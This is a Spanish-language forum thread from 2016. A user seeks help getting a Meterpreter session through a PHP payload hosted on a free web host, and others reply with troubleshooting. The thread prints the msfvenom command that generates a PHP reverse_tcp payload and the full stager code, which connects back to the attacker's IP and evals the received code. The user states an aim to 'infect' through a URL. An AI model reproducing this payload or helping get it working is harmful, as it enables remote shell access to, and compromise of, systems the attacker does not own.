Ayuda: Conseguir sesión de meterpreter con un payload PHP fuera de red

Iniciado por cibi, Julio 20, 2016, 11:52:59 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Imprimir
Ir Abajo Páginas1
Acciones del Usuario
Julio 20, 2016, 11:52:59 AM Ultima modificación: Julio 20, 2016, 02:27:04 PM por Stiuvert
Hola necesito ayuda para conseguir una sesion de meterpreter visitando una url atraves de un payload php por ejemplo yo genero el payload
php con el siguiente comando:
msfvenom -p php/meterpreter/reverse_tcp LHOST=IP PUBLICA LPORT=4444 R > exploit.php
Tengo los puertos abiertos en el router 4444 subi el payload a un hosting free y utilize el exploit/multi/handler para esperar la conexion pero al entrar a la url al exploit.php se queda un rato cargando y me sale el siguiente mensaje:
no socket
Lo he probado varias veces pero no conecta y no recibo la sesion de meterpreter...
Alguien sabe que puede pasar?
Julio 25, 2016, 08:17:53 PM #1
Postea el codigo de exploit.php

es probable que use sockets y esten deshabilitados como en muchos hostings gratis
Julio 28, 2016, 05:38:26 PM #2
Este es el codigo del exploit.php lo he probado tanto dentro de red como fuera de red:

Código: php
/*<?php /**/ error_reporting(0); $ip = '192.168.1.35'; $port = 4444; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } elseif (($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } elseif (($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } else { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; eval($b); die();


El problema que no me da la sesion de meterpreter y quiero infectar por url dentro de mi red o fuera de red he probado de quitar el comentario del principio /* y añadiendo al final : ?> pero tampoco conecta alguien puede ayudarme? Esto es posible? Hacer una intrusion de esta manera?

Al entrar al link me sale el mensaje: "no socket"
Agosto 01, 2016, 07:49:32 AM #3
Dónde estás subiendo el archivo?

Saludos.


Agosto 09, 2016, 07:21:04 PM #4 Ultima modificación: Agosto 09, 2016, 07:23:52 PM por seth
Es probable que las funciones que usa esten deshabilitadas en un hosting gratuito. Eso lo podes ver corriendo phpinfo() y buscando disable_functions
Subi un archivo con esto y abrilo en el navegador:
Código: php
<?PHP phpinfo();



Como lo probaste adentro de la red?
Imprimir
Ir Arriba Páginas1
Acciones del Usuario